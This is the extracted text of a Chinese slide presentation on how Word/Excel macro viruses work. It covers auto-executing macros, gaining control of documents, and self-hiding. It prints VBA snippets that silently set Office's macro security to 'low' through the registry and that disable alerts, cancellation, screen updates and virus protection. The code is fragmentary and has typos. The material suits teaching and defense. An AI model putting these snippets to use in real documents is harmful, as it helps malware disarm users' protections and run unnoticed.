宏病毒原理及实现.ppt

WORD 宏病毒的生命周期 * →编程语言：VBA、WordBasic等 →运行环境：VBE Word宏病毒的感染过程 宏病毒原理大揭秘 1、降低宏安全级别 以office2003版为例If Application.Version <> “11.0” Then ’判断office版本strFullname = ThisWorkbook.FullName '取得当前工作薄的全名strVBS = Replace(UCase(strFullname), ".XLS", ".vbs") ‘temp文件VBS的文件名Set WSH = CreateObject(“Wscript.Shell”) ’创建Wscript对象Err.ClearOn Error Resume Next ’出错不提示，继续regStr = "HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Word\Security\Level“ '注册表中Excel vba安全级别位置ret = WSH.RegRead(regStr) '读取当前安全级别If Err.Number <> 0 Then ? ?'判断读取是否成功?? vbOKOnly + vbCritical, "Keanjeason"????? Exit SubElse? '如果当前Excel VBA安全级别不为“低”,则设置为“低”,值1-4分别对应：低，中，高，非常高 If Val(ret) <> 1 Then ret = WSH.RegWrite(regStr, "1", "REG_DWORD")End If 1、用户使用Word执行打开文档、保存文档、打印文档和关闭文档等操作时，Word会查找指定的标准宏： 例1：关闭文档之前查找“FileSave”宏，如果存在，首先执行这个宏 例2：打印文档之前首先查找“FilePrint”宏，如果存在则执行这个宏 2、Word中另外还有一些以“Auto”开始的宏（自动宏），如“AutoOpen”、“AutoClose”等，如果建立了这些宏，打开/关闭文档的时候将自动执行这些宏，这些宏一般是全局宏，对任何Word文档都有效。 病毒触发要隐含在正常的操作中，这些自动执行的宏然是最好的宿主。 2、文档的控制权获取 宏病毒常用到的宏如下表所示 类别 宏 名 运行条件 自动宏 AutoExec 启动Word或加载全局模板时 AutoNew 每次创建新文档时 AutoOpen 每次打开已存在的文档时 AutoClose 在关闭文档时 AutoExit 在退出Word或卸载全局模板时 标准宏 FileSave 保存文件 FileSaveAs 改名另存为文件 FilePrint 打印文件 FileOpen 打开文件 高明的病毒编写者其自我保护将做得非常好，可以使word的一些工具栏失效，例如将工具菜单中的宏选项屏蔽，也可以修改注册表达到很好的隐藏效果。 常用代码示例： On Error Resume Next '如果发生错误，不弹出出错窗口，继续执行下面语句 Application.DisplayAlert = wdAlertsNoe '不弹出警告窗口 Application.EnableCancelKey = wdCancelDisabled '不允许通过ESC键结束正在运行的宏 Application.DisplayStatusBar = False '不显示状态栏，避免显示宏的运行状态 Application.ScreenUpdating = False '不让刷新屏幕，避免病毒运行引起刷新速度变慢 Option.VirusProtection = False '关闭病毒保护功能，运行前如果包含宏，不提示 Option.SaveNormalPrompt = False '如果公用模板被修改，不给用户提示窗口而直接保存 3、宏病毒的自我隐藏 Virus 宏病毒的原理及